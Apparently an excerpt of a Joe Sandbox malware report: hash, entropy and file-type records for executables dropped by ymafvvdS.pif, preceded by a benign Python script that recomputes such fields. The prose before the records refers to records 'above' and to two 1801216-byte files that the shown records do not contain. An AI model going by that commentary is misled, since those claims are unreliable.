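Each dropped-file record above gives the libmagic file type, size, 8-bit entropy and the MD5/SHA1/SHA-256/SHA-512 digests of a file written by C:\Users\Public\Libraries\ymafvvdS.pif. The script below is an added example, not code from the Joe Sandbox report or its tooling: it recomputes those fields from a file's bytes (Shannon entropy in bits per byte, which is assumed to be the same statistic as the report's "Entropy (8bit)"; PE32 vs PE32+ from the optional-header magic, plus the COFF Machine and Subsystem fields) and lists which report fields the bytes fail to reproduce. The sample input is a constructed minimal PE header layout, not one of the files in the report, and SSDEEP is skipped because it needs the external ssdeep library.

```python
"""Recompute the per-file fields a Joe Sandbox dropped-file record lists and
check them against the report. Added example, not code from the report or its
tooling; the sample bytes below are constructed, not one of the dropped files."""
import hashlib
import math
import struct

MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64"}      # IMAGE_FILE_MACHINE_*
MAGICS = {0x10B: "PE32", 0x20B: "PE32+"}                  # optional-header magic
SUBSYSTEMS = {2: "GUI", 3: "console"}                     # IMAGE_SUBSYSTEM_WINDOWS_*


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 (constant) .. 8.0 (uniform). Assumed to
    be the same statistic as the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_file_type(data: bytes) -> str:
    """Describe a PE in the report's libmagic style from three header fields:
    optional-header magic (PE32 vs PE32+), COFF Machine, and Subsystem."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not a PE (no MZ header)"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    opt = e_lfanew + 4 + 20        # PE signature, then the 20-byte COFF header
    if opt + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "not a PE (no PE signature)"
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)   # same offset in PE32 and PE32+
    return "%s executable (%s) %s, for MS Windows" % (
        MAGICS.get(magic, "PE(magic 0x%x)" % magic),
        SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem),
        MACHINES.get(machine, "machine 0x%x" % machine),
    )


def file_record(data: bytes) -> dict:
    """The recomputable fields, keyed exactly as the report prints them."""
    return {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy_8bit(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def mismatches(data: bytes, report: dict) -> list:
    """Report keys whose value the bytes do not reproduce. Keys this script cannot
    recompute (SSDEEP needs the ssdeep library; Malicious/Reputation are verdicts)
    are skipped rather than flagged."""
    ours = file_record(data)
    bad = []
    for key, want in report.items():
        if key not in ours:
            continue
        got = ours[key]
        if isinstance(want, float):
            same = abs(got - want) < 1e-9
        elif isinstance(want, str):
            same = got.upper() == want.strip().upper()
        else:
            same = got == want
        if not same:
            bad.append(key)
    return bad


def build_sample_pe(machine: int = 0x8664, magic: int = 0x20B, payload: bytes = b"") -> bytes:
    """Constructed stand-in with just the header fields pe_file_type() reads.
    It is not loadable and is not one of the files in the report."""
    opt_size = 240 if magic == 0x20B else 224
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")  # e_lfanew = 0x80
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x22)
    opt = (struct.pack("<H", magic).ljust(68, b"\0") + struct.pack("<H", 2)).ljust(opt_size, b"\0")
    return dos + b"PE\0\0" + coff + opt + payload


if __name__ == "__main__":
    sample = build_sample_pe(payload=bytes(range(256)) * 4)
    record = file_record(sample)
    for key, value in record.items():
        print("%s:%s" % (key, value))
    # A "report row" for the sample is its own recomputed values with one digest
    # deliberately wrong, so the check has something to flag.
    row = dict(record, MD5="0" * 32)
    print("mismatches:", mismatches(sample, row))
```

Against a real artifact, feed `file_record(open(path, "rb").read())` the bytes you carved or downloaded and compare with the row in this section. A digest mismatch with a matching size and entropy usually means a different build of the same dropper output rather than a corrupt download; the two 1801216-byte files above, with near-identical SSDEEP values but different MD5/SHA values, are an instance of that pattern within a single run.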
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1335296
                                                                                                                                                                                                                        Entropy (8bit):5.229032573509208
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:24lssmroCVWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y45:2cssmrmqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:FF60FE5EFAD9913EA0302DD6EE06494C
                                                                                                                                                                                                                        SHA1:F6F1F80C0155673E7E41FB1251CDE65D58E3F5D4
                                                                                                                                                                                                                        SHA-256:6B6869FF015682381491E634D9BF2E66B80B35F65ED59BFE108AF1962C29C7EE
                                                                                                                                                                                                                        SHA-512:C3A5F2FB3FDEA69303E85A8C8A71D788F1F1365852B01236EA6FCF4F0A57A5CFD5C342BB2C718A5033D06CA27C8C0489C4D893072D10FE382D31669564E08FD2
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                                                                                        Entropy (8bit):5.330860311171296
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:i7fcT++foSBWU2YxhkgNqYdTt/hXV0cfQ9Y4:6fcK+foQWU2YnPNqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:585644551DBD80092E9548718B8AF1C6
                                                                                                                                                                                                                        SHA1:079689FA3450FDFB65C85FD0E78BAD98F2E63EA5
                                                                                                                                                                                                                        SHA-256:3CB9CDA67EDFB5404690BD29D6CE50926E86FBCE5865CE6784C63C9789C2185C
                                                                                                                                                                                                                        SHA-512:CD2C1027350946882EED0CA5BC80983E2E3DD772E530A93526C6ED5BFFD1D9BED23EB06371B3C30B6ABC3ACF2185D98F6FA00E4CC0B8F24B175AB58801F45D17
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                        Entropy (8bit):5.130172941025364
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:obrNRzB+NCWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:obBRzBgtqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:FE88DF4257739DACF395D1D7F2748C33
                                                                                                                                                                                                                        SHA1:F9B89B23B61FFBCE8311DBCFC6E244FDA921B8A2
                                                                                                                                                                                                                        SHA-256:BE93282EB4EE8C78EC3A39C8CE8ADC2497D83354A750FBBA2B2306F04F975068
                                                                                                                                                                                                                        SHA-512:948F3DDB4660283BAFCD677AB801779A4026B0E94448740767B006F4004F11FD92269755DA6700EEDA252E67639F5BFF5BCD6D6A70DAE3FD2F925309AAB3B8E8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                                                                                        Entropy (8bit):7.938448016926182
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:Py53w24gQu3TPZ2psFkiSqwozLqQTt/hXV0cD:PyFQgZqsFki+ozDTthF3
                                                                                                                                                                                                                        MD5:C43C52F78479D8E174DD7E5BE52E7B0E
                                                                                                                                                                                                                        SHA1:0F5BA8FC5AC0E054B31D82D98E427FB26DDF700B
                                                                                                                                                                                                                        SHA-256:8C6314F52128E7E9391EBB4D17B8CAE7D25E123C3052AA18D7E27D04641BF00E
                                                                                                                                                                                                                        SHA-512:F379DFB7D94A08BE32D481E2F75990E0EC1F0FD5FC8DCEE9CAEAD1D818AB8219836A0857AD2617B7FF6BD266ACDF86409E416FA375B2FC3DD8AF1525CEDF717D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3141
                                                                                                                                                                                                                        Entropy (8bit):4.813593782728129
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:l2dwQrbeP4BrRzRWtFgRWmIFW1w3JuPhRWqFwvRxRWlbFRW07F9vWYRWqNFRq4+c:EieRo1mvyXJe4dqY3pnGD
                                                                                                                                                                                                                        MD5:1403E7F97DAB3BBC362E4A4A59AAEBAD
                                                                                                                                                                                                                        SHA1:3D4E073F904284E941144B832D95A0963916E11B
                                                                                                                                                                                                                        SHA-256:74064A0345CEDB91188A2356CFD855C38A62BCF4C5FD29D17D54D0A0D89CE2F6
                                                                                                                                                                                                                        SHA-512:A96E48A8F7B715D6D7071EBFD93F51BFD9D8FBDFCEA878F7DC4766E355E416BAB8095B2823AD4ECE2D9492718EB440B07D9519639BA16951AC16F355DAF8A007
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-10 01:05:44-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-10 01:05:44-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-10 01:05:4
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                        Entropy (8bit):5.347825833969815
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:DQVTZu0JksqjnhMgeiCl7G0nehbGZpbD:0VTZuFDmg27RnWGj
                                                                                                                                                                                                                        MD5:5AF7A965937863A10C99D5EC19A974A5
                                                                                                                                                                                                                        SHA1:2B6D06C41D178F926A797D31A8E978CB1E51D092
                                                                                                                                                                                                                        SHA-256:7543D6D85044E2461026B9A8C43A4214352B7E0D61813B199D365A12CA1C031B
                                                                                                                                                                                                                        SHA-512:42EF2D8E268C92125669BC2DCA1356B0CCEB8BEAE33F873ED813BADD2B87E40A2A44F76D1146D415CC674EBAC68035F015D682C8C8A060315DDCDAE096EB0E01
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                        Entropy (8bit):5.62311271526534
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:e+gkESfh4CofsqjnhMgeiCl7G0nehbGZpbD:TgkE+S5Dmg27RnWGj
                                                                                                                                                                                                                        MD5:00E9B63DBC557C028484E3495B99BFFC
                                                                                                                                                                                                                        SHA1:9B9AF4A277ED9AC064E5338AA687417E5F39B076
                                                                                                                                                                                                                        SHA-256:C4F036418883E88EC4AFF8B81F88DCD97EE4FD9B22A49549857C096DCAC6F377
                                                                                                                                                                                                                        SHA-512:A6186BA5E7F861055C2603218E8AD3693F7D1E3161307C17C5094BA57E65AD15D908340F877D1F5AC81A762C16C22B0BC59175FA6A5A515A0AD4D5555B9CA2D0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1532416
Entropy (8bit):7.096643945941094
Encrypted:false
SSDEEP:24576:/BpDRmi78gkPXlyo0Gtjr8sqjnhMgeiCl7G0nehbGZpbD:pNRmi78gkPX4o0GtjEDmg27RnWGj
MD5:5040C8649D02B00353D98558FA93A634
SHA1:38B0DDE5AAB8875EE2C4BAB4E59A44234E2239D8
SHA-256:D2413EE78F1C4569D97C20E06657643128441F5F7539715F845D2F07333EE269
SHA-512:4C42F21AFA5E534C587412EBCA2FCA19AE05CD98C565B69EAC56B22C72A303C76352AB81F60254538C04D65910AC9B39706CF61DE2A8C10D07F7A57E0A70DC10
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1282048
Entropy (8bit):7.229034650123738
Encrypted:false
SSDEEP:24576:qLOS2oTPIXVfsqjnhMgeiCl7G0nehbGZpbD:a/TsDmg27RnWGj
MD5:59927EE8A104658B6BA82DA41236D06C
SHA1:72E30FB6FA2F64445D33471DDE5ABEC85D808DE2
SHA-256:0B9C17928A70CA92184B9A34E867571A60EC84DAEBE71AEB5309684D87C36274
SHA-512:759199B433CD7096FE2808176506471FF2C56901D6E46EA5F4F26699E8D7F2E9575787D17F96FC363BAF5094010DF54E49EE60E456DF479DABD29A3643B7A894
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1145344
Entropy (8bit):5.031176139948462
Encrypted:false
SSDEEP:12288:o1lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:o1lsqjnhMgeiCl7G0nehbGZpbD
MD5:DEE1533F86738D4485164509B2E9A781
SHA1:FD33F6CD05550FC11141DBDAC440226088B2FFFF
SHA-256:DDE96339D8650AE1D586344C81EFC4AD80C2B986CC6D82AF9157DFD4CEA3BFC5
SHA-512:68A00C8143DC565343E7D85DB795397BD5508CCFC88A2FB1190722EC3D61560E96B01EB5C00640E11EC6970B74C1CE6E54E8A649B4F1ADEF9CFAA5D1FFC489CE
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1222656
Entropy (8bit):6.711997539614624
Encrypted:false
SSDEEP:12288:5Rudz6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5Adz6sqjnhMgeiCl7G0nehbGZpbD
MD5:B818007EBD00ABCF6E67B2BD6C543B27
SHA1:43D864A80039A2BCEB7020709EAEDC44B6838793
SHA-256:2CABD5DD3E46B45D4C6D9E202A57988C7C09CEC8ED0A355DC1AB3655857E31E9
SHA-512:1825525C9F5CC983CD92DEAAAE60F320590226DF229FA735FEE78BCE32EA7166BAB2AE3B523792A7B5569EC175C79554D5E51E3F5B07C8E17A425E7D24EC6201
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1457664
Entropy (8bit):5.082138606680795
Encrypted:false
SSDEEP:12288:yvOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:HsqjnhMgeiCl7G0nehbGZpbD
MD5:BBDA931992D89B311F8F9ACAFD0DD6F0
SHA1:8F5E831121A359E89CF250B8C65EDC3C1F9A1071
SHA-256:04C16837D841D368EFFC7F007E20C5316D89F5788A33B04F5B459B3083DC6520
SHA-512:0B2C8F8FBCBD2F1F78F30674BB210F1717398A9750BE6D6BB8E7FF89C1DC9CB2AAFDFB4DBBEEEA6F1E2478348476CC7079A1D570AD587772E8174969C357648C
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1461248
Entropy (8bit):5.46860245442752
Encrypted:false
SSDEEP:24576:/5zhM1XSE7sqjnhMgeiCl7G0nehbGZpbD:DMsODmg27RnWGj
MD5:CC9B11BDA20123EA7325143C7ACC247C
SHA1:054B679EE1F17F78A7138DF70AA68BDC4842A542
SHA-256:4482E55EC1168DE21CED077B2E83243CAA59D22E41EC2C07D7A37AC5F1E23D63
SHA-512:8457384235D5F338155F2227A7635F37154C1C230E468FBA80087CE362E3432CDBB92B1B2DF35B9477EE2EF3F4C4FA4B38FCA4E4D03AA09B98A51BBAC1960758
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.4997794099032005
Encrypted:false
SSDEEP:49152:UtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755gDmg27RN:UjEIa4HIEWOc5aD527BWG
MD5:08BAD6105552BA3528E01FC6745B0F3D
SHA1:ADE4E799A94FE73F9D2DB5F9BFA7740017728AC9
SHA-256:4F28B7C66AF33AAB36377E5066C51002548DABD04C3287307E22522BEE715F65
SHA-512:E866B274B1166FCBD4133DD23AD2E3C008A4674B37FDB6EED3E7607E10997DFDEA42B00E46E2BA9D8801F7229EAD97484E5110B77842ABA5767AF347C7E5D1E1
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                        Entropy (8bit):7.999367299934912
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:1572864:iQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:ZXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                        MD5:5CEFAD8FC42CDAA882E1914878B301AE
                                                                                                                                                                                                                        SHA1:328FA2D8D4F65156CF4AAAA79611A23391F5BE8A
                                                                                                                                                                                                                        SHA-256:9892755DB9495FF8C5EBC4657E085C438F30FEA3FEBBDFC221F80617300BDEAA
                                                                                                                                                                                                                        SHA-512:D2B9DD0D1E4314DB07750C97661B9AC82504B67BA569712CE1D74F66A2612363E9F67C0E3DEC1722258F1BE2D54C0D0787FD9E5F9A7129B0AC4678C89DFFD17F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0........... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1180160
                                                                                                                                                                                                                        Entropy (8bit):5.084799543039932
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:eWeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eLsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:1DC43EC9B6847AB0D2629B607DDF560B
                                                                                                                                                                                                                        SHA1:D63CDFF7E993317DBF8596E418E9A05DF9AC4196
                                                                                                                                                                                                                        SHA-256:F460B3FFCCC4B8816E6F33DA5100D2D26DC4B26607581980D25ED8C797A7D52B
                                                                                                                                                                                                                        SHA-512:A528B66D80B8CB35F819AC7F8A15B71E15F35B773AA91FFF5E6D52493EBA6C73F2CAEA2526A94ADD3E7B1A17BCAE84CD8C1E9D27D46228183A94B48DA2930784
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......'3.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                                                                                        Entropy (8bit):6.386701565493479
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:yDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXG:DnN9KfxLk6GEQTX5UKzNDhD527BWG
                                                                                                                                                                                                                        MD5:73A9EB886A04C0803792CBB7FB5F8581
                                                                                                                                                                                                                        SHA1:C6E534E59B5B74DC2FBCE55DFCB5FE9AD7AE8B82
                                                                                                                                                                                                                        SHA-256:99B46636D18BDC2E4F58922D7C90D1D5E89DAAE36D05E09A9ABE57B3510D6344
                                                                                                                                                                                                                        SHA-512:25F083AD7752348D029C6DB57F2599BB121C71AB758BFBEEFB5216D1721EE21BB22D4388D92E0C9E70EF3790733CFB45A3D9A50E187D43CBB4E1714C6F1100D4
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....C.^... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1157120
                                                                                                                                                                                                                        Entropy (8bit):5.041478663897403
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:UDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:UDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:389823CBA4DF7A0F4C117B9B84C566AA
                                                                                                                                                                                                                        SHA1:D897C1E99C3160281C7849A8A86C0E8E3156B751
                                                                                                                                                                                                                        SHA-256:41EF43F472349026CE6AF7FD5CBC414F4071FF296D829AB1780F47D40793F411
                                                                                                                                                                                                                        SHA-512:C247B199923A1F9D1E91F6D3694CD7E637263BB5C6BB0068E045D3AB6C6035CDE6FDE5CD1DE529DC0E5186B505EF1AD16E8ED54386D67776AC624C81359912F8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................;C.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                                                                                        Entropy (8bit):6.596675052286067
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:Tb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKwD527BWG:fnPgTHIwZoRBk9DdhSUEVIXgKwVQBWG
                                                                                                                                                                                                                        MD5:6557F2907007AD01DBE9027F4F3C1140
                                                                                                                                                                                                                        SHA1:41FA45DDAE9FD0838A1B4857C8C43A2A0C6928C7
                                                                                                                                                                                                                        SHA-256:78560DF7C0B5152C07A5E5F00700447F05C60A5E344CCC3E29652C314CE314A2
                                                                                                                                                                                                                        SHA-512:069630D182F4AF15D210B257BF0FE749FBF16DDEAF33ACE4953D862DC275A86739650061901314C1E60E7FAF8F92F99DBC45E9A6F79D670F43F29AF2E93E217E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1322496
                                                                                                                                                                                                                        Entropy (8bit):5.281796657227052
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:lg5FvCPusEsqjnhMgeiCl7G0nehbGZpbD:CftzDmg27RnWGj
                                                                                                                                                                                                                        MD5:A1DC1BB0EBD64CD0EEF24B55681564E4
                                                                                                                                                                                                                        SHA1:3EBE4A4329ACEAE9BD64AD89EABF81ECEFC33651
                                                                                                                                                                                                                        SHA-256:D540FF8D6D3D7E728866332EE41DABC2C76076CDB7D2D433AC51CC3BE202DAB4
                                                                                                                                                                                                                        SHA-512:22C36A51FCD0A671B58B07BB61E3125562738C838FC7835B979680844DF7C51EEE40199AEAF5D6D51066DB57643D46DA4C6AF31AA166AA5CBD972E04C58C1CC0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......+E.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
